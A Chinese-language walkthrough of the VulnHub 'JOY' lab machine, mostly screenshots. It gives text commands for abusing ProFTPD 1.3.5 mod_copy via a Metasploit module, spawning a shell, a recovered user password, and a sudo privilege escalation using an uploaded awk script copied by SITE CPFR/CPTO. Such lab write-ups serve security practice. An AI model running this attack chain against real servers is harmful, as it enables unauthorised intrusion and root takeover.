JOY靶机
仅供个人娱乐
靶机信息
下载地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
一、主机扫描
![](https://upload-images.jianshu.io/upload_images/4664072-d74087ebfe2e54ea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
二、信息收集和漏洞利用
![](https://upload-images.jianshu.io/upload_images/4664072-578d2db2f37c632c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-28ea7f8044e1efa5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6ad9b6ee1d5e13ff.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-0028864e7ca6ffa3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
FTP服务允许匿名用户(anonymous)登录
![](https://upload-images.jianshu.io/upload_images/4664072-6ef46ade5b9ad1df.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
或者
![](https://upload-images.jianshu.io/upload_images/4664072-f928951677e0d576.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3f437bf38ffa4503.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-510a5d5fe319d3b3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
由于version_control存在于patrick路径中,我们是没有权限去获取的,所以尝试将其转移到/upload路径中
![](https://upload-images.jianshu.io/upload_images/4664072-51741c752745c7e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e9c20bb20de217dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
敏感信息
ProFTPd: 1.3.5
/var/www/tryingharderisjoy
![](https://upload-images.jianshu.io/upload_images/4664072-1855ab477e817ce4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d27bf2a05242168b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
故障 更改ip
use exploit/unix/ftp/proftpd_modcopy_exec
set rhosts 192.168.74.130
set sitepath /var/www/tryingharderisjoy
run
python -c 'import pty; pty.spawn("/bin/bash")'
![](https://upload-images.jianshu.io/upload_images/4664072-3c9e60b7b2015e51.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-86e73b77fcf68575.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
su -l patrick apollo098765
提权
本地主机编写脚本
echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
使用ftp上传到upload anonymous
![](https://upload-images.jianshu.io/upload_images/4664072-7e386e44b1b6a3f7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-05668887af0219d3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
在使用telnet转换一下路径
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test
使用脚本
sudo /home/patrick/script/test
cd /root
cat proof.txt
![](https://upload-images.jianshu.io/upload_images/4664072-92412f0cd3dbf61b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
搞定
参考文章https://blog.csdn.net/weixin_44214107/article/details/101228240